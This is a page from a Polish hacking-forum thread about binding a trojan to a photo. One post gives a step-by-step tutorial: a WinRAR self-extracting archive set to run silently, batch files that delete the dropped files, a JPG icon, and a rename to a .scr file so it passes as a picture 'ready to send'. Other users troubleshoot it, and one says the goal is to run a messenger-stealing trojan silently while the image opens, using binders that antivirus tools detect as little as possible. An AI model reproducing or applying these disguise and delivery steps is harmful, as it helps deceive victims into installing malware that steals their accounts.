+ Odpowiedz na ten temat
Strona 2 z 3 PierwszyPierwszy 1 2 3 OstatniOstatni
Pokaż wyniki od 16 do 30 z 36

Temat: scr + jpg

Użytkownik

Domyślnie

batch usunie rozpakowane pliki tylko napisz go poprawnie...

KangurX
    Guest

Domyślnie

dobrze go napisalem

mialem pliki lol.jpg lol.exe i plik.bat

a kod wygladal tak :

Kod:
    echo off

del lol.jpg // usuwa fotke

del plik.bat // usuwa samego siebie

del lol.exe // usuwa trojana
    moze te komentarze usunac?

Użytkownik

Domyślnie

:whoeva: :whoeva:

Kod:
    echo off

del lol.jpg

del plik.bat

del lol.exe
    za co ty masz te 14 razy "pomógł" :whoeva: :whoeva: :whoeva:

już chce mi sie śmiać jak w podpisach macie "wciśnij pomógł" co wam o tym punkciku

KangurX
    Guest

Domyślnie

wkoncu sie ma to cos ^^ :whoeva:

przy otwieraniu pliku *.scr wyskakuje blad i dalej sie wypakuje all a jak klikne wypakowany plik.bat to usuwa zdjecie i samego siebie

Użytkownik

Domyślnie

:glupek2: Musiałeś coś pomieszać w komentarzach... może napisze tutek jak zrobić taki plik ale nie chce mi sie na razie

// Napisałem mini TuT macie

__________________________________________________ ___________

WinRar...? Binder...!

1. Po pierwsze musimy mieć plik który jest trojanem zakładamy że nazywa się "trojan.exe"

2. Musimy znaleźć fotkę która będzie otwierała się razem z trojanem, obojętnie jaką, można ściągnąć jakąś z internetu...

3. Tworzymy nowy folder "Nowy Folder" do którego pakujemy oba pliki, "fotka.jpg" oraz "trojan.exe"

4. Otwieramy systemowy notatnik i piszemy w nim następujący kawałek kodu:

Kod:
    echo off

del fotka.jpg

del trojan.exe

del batch.bat
    następnie zapisujemy plik pod nazwą "batch.bat" i wrzucamy do "Nowy Folder" tam gdzie pozostałe pliki.

5. Zaznaczamy wszystkie 3 pliki i klikamy PPM z menu wybieramy "Dodaj do archiwum..."

6. Zaznaczamy "Utwórz archiwum SFX"

7. Następnie przechodzimy do zakładki "Zaawansowane" w której wybieramy "Opcje SFX..." w oknie które nam sie pokazało przechodzimy do zakładki "Tekst i ikona" a następnie klikamy na przycisk "Przeglądaj" znajdujący się OBOK NAPISU "Załaduj ikonę z pliku". Szukamy ikony(rozszeżenie .ico) pliku .jpg i dodajemy ją, następnie klikamy "OK". Następnie przechodzimy do zakładki komętarz i w oknie "Wpisz komentarz" wpisujemy tak:

Kod:
    Silent=1;

Setup=trojan.exe;

Setup=fotka.jpg;

Setup=batch.bat;
    Po wpisaniu komentarza naciskamy na "OK" i czekamy aż plik się spakuje, w wyniku czego powinniśmy otrzymać plik "Nowy Folder.exe". Pozostała jeszcze zmiana nazwy i rozszerzenia pliku.

8. Archiwum który utworzyliśmy wrzucamy na dysk C:

9. Otwieramy CMD (Start->Uruchom->Wpisujemy "CMD"). W CMD piszemy "COPY C:/Nowy Folder.exe C:/Zdjecie_004.scr" i dajemy ENTER. Wchodzimy na dysk C: i tam powinniśmy mieć plik o nazwie "Zdjecie_004.scr" i ikonie pliku .jpg

KONIEC !! Plik gotowy do wysłania

Użytkownik

Domyślnie

nie wiem co robie nie tak, ale mi nadal wywala błąd, że nie może odnaleźć pliku :kreci: i wypakowuje pliki obok dopiero jak klikne na batch zostaje tylko fotka i nowy folder.exe

Użytkownik

Domyślnie

u mnie wszystko śmiga jak należy

Użytkownik

Domyślnie

Originally posted by lisek160
    :whoeva: :whoeva:

Kod:
    echo off

del lol.jpg

del plik.bat

del lol.exe
    za co ty masz te 14 razy "pomógł" :whoeva: :whoeva: :whoeva:

już chce mi sie śmiać jak w podpisach macie "wciśnij pomógł" co wam o tym punkciku
    Originally posted by KangurX
    wkoncu sie ma to cos ^^ :whoeva:

przy otwieraniu pliku *.scr wyskakuje blad i dalej sie wypakuje all a jak klikne wypakowany plik.bat to usuwa zdjecie i samego siebie
    patrzcie za co kochany kangurek dostał reputki..
    posty typu:

Oooo no to fajnie ^^[/b]
    to napisz jaka ;][/b]
    Program wypas gratulacje dla autora ;][/b]
    prosze o rehosta tego linku na megaupload albo na rapida bede bardzo wdzieczny bo link juz wygasl ;][/b]
    @lisek160
    śmiga ładnie, dzięki

KangurX
    Guest

Domyślnie

to nie za to, tylko goscie mnie nie znalezli to dali na byle jaki post ;]
    (o ten rehost co prosilem to jest to) reszta to od czegos innego "pomógł"

Sam sie dziwie

Użytkownik

Domyślnie

nie wiem co jest nie tak siedze i siedze zrobić nie mogę :glupek2:

Użytkownik

Domyślnie

a mnie qrna ikona sie zmienia po zamianie na src:(

Użytkownik

Arrow

Witam!

Mam kapecke problem Wiec postanowiłem odświeżyć topic Mam nadzieje, że ktoś z forumowiczów będzie w stanie mi pomóc Postępuje dokładnie z poradnikiem, ale gdy klikam na gotowy pliczek scr... Występuje błąd... Mianowicie nie można odnaleźć plików... Wszystkich trzech, które były pakowane SFX Następnie pojawiają się i... To wszystko.. Nic się nie dzieje... Nie otwiera sie ani trojan (Złodziej GG v1.1) ani jpeg...
    Chciałbym aby efektem końcowym mojej pracy był plik scr, który po otwarciu otworzy obrazek, a w tle bez zadnej informacji dla użytkownika otworzy sie trojan i porobi co trzeba Proszę o pomoc! Oczywiscie w gre wchodzą inne bindery( oczywiscie o jak najmniejszej wykrywalnosci) chodzi tylko o to aby efekt końcowy był taki jak mnie interesuje

Użytkownik

Domyślnie

wiele się pisze na tym forum jak zbindować rarem, ale czemu nikt nie nakręci filmiku. Chętnie bym zrobił taki filmik ale jestem zalatany i nie mam czasu a wieczorem mówiąc szczerze jestem zbyt zmęczony. Jeden filmik by wystarczył i zniknęły by rozmowy na temat jak zbindować pliki rarem.

Użytkownik

Exclamation

Problem udało mi się rozwiązać samemu Na szczęście... Co do pomysłu z filmem świetna sprawa, samo bindowanie rarem nie jest czyms strasznym, ale początkujący ( w tym Ja ) może sprawić trudnośc kodowanie archiwum

Użytkownik

Domyślnie

<div class='quotetop'>CYTAT(Harpagan @ 15.05.2008, 12:31) <{POST_SNAPBACK}></div>
    Problem udało mi się rozwiązać samemu Na szczęście... Co do pomysłu z filmem świetna sprawa, samo bindowanie rarem nie jest czyms strasznym, ale początkujący ( w tym Ja ) może sprawić trudnośc kodowanie archiwum [/b]
    Mam taki sam problem jak ty jesli bylbys na tyle mily i moglbys powiedziec co jest nie tak to bylbym wdzieczny najpierw siedzialem 2h przy ostatnim punktcie bo nie chcialo mi sie skopiowac a teraz to aff z gory dziekuje
    KALI~

+ Odpowiedz na ten temat

Uprawnienia